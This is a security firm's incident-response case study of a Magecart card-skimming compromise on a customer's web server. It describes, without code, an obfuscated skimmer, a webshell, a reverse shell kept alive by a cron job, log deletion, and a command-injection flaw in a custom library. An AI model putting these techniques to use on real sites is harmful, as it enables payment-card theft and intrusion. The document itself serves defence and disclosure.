Everyone says there are two types of organizations: Those who know they've been compromised, and those who don't. While there's certainly a lot of truth to this, in our time as a Managed Security Services Partner, we've found there are generally three types: Those who don't know they've been compromised, those who do know, and those who choose to do something about it.
No one ever likes to hear the phrase "You've been compromised." For many companies, this means dedicating resources they don't have to problems they might not have the tools, resources, or time to solve. However, MSS partners are well equipped to handle incidents such as this. From the initial investigation, all the way to resolution, and can provide further detection services to ensure any further attacks are detected, so that problems like this don't happen again.
Today, we're taking a closer look at a Magecart attack. Magecart is a collection of malicious attackers that gain (and sell) unauthorized access to public-facing assets. Once access has been obtained Magecart operatives will usually compromise javascript or PHP files to maintain control and access of a website and skim checkout/shopping cart forms for payment information. Once the actor has completed their actions on objectives they may further monetize the compromise by selling access to the victims’ site.
While they initially started with Magento, Magecart has since evolved to thousands of different websites and platforms. Companies as big as Amazon and Paypal have fallen victim to Magecart, alongside thousands of other e-commerce companies.
A recent customer to Emagined discovered some unauthorized files on an internet-facing web server. One of the malicious files contained references to aws-cdn[.]com, a known MageCart domain. The payload for this request was highly obfuscated to avoid detection by traditional tools.
The investigation by the customer determined that an unapproved account was created to maintain control and persistence in the victim's environment. To further complicate the investigation, the actor deleted administration and authentication logs.
The company detected this new account and immediately reset admin passwords and revoked all admin sessions. But despite this more malicious files were discovered on the webserver shortly after this. This only meant one thing; The attackers had another way in.
It was clear that this was a much bigger problem than just a single malicious file. After this discovery, Emagined Security was brought on board for further investigation and Incident Response support.
“In our time as a Managed Security Services Partner, we’ve found there are generally three types: Those who don’t know they’ve been compromised, those who do know, and those who choose to do something about it.”
- Emagined MSS
Emagined Security's Incident Response Specialists began their investigation and discovered that an adversary was selling access to this victim's environment through an underground marketplace.
On the first day of investigation, Emagined consultants discovered that a cronjob was set up on the compromised web server that contained a reverse shell, which is what allowed for further malicious files to be added despite administrative access being revoked. Logfile analysis further showed that one of the PHP files on the website was acting as a PHP Webshell.
The adversary was clearly skilled enough to maintain multiple ways into the victim's environment.
Once access was obtained, the adversaries then modified static files and included code that would forward payment data to a third-party website. This website looked very similar in nature to the legitimate customer's website, likely an attempt to evade detection.
Emagined Security's investigators utilized the service "The Way Back Machine" from Archive.org to confirm the period of exposure for the customers site. Since MageCart modifies Javascript files, the skimmed payment data never went to the customers website, rather it went to a third-party payment processor and the actors look-a-like domain.
Additional victims were identified using the actors infrastructure and similar "look-a-like" domains in passive DNS.
Ultimately Emagined Security was able to identify a single library in the customers website that did not properly parse website variables. In the very few cases where this library was used an attacker could manipulate the request to launch OS level commands on the host.
This library was written and maintained by the victim organization and not publicly available. The adversaries persistence and likely a scanning tool ultimately lead to the full system compromise. The victim was able to rebuild their environment securely and patched the original vulnerability. The actors have been unable to access the machines since.
It is important to note that while there were atomic indicators associated with this threat, they change per environment. In some cases, they change even more frequently as the obfuscator used by MageCart makes individual hashes a moot point.
The actors however were unable to hide their tactics and techniques. Their playbooks are solidified. In the end, it was the playbook and some great detective work that was their undoing.
Defense in depth is one of the most crucial defenses against malicious groups, hackers, and APTs for any organization. If you have any questions about how Emagined Security could protect your environment or would like to learn more about the services Emagined offers, such as MSS services, incident response, and penetration testing services, feel free to contact us.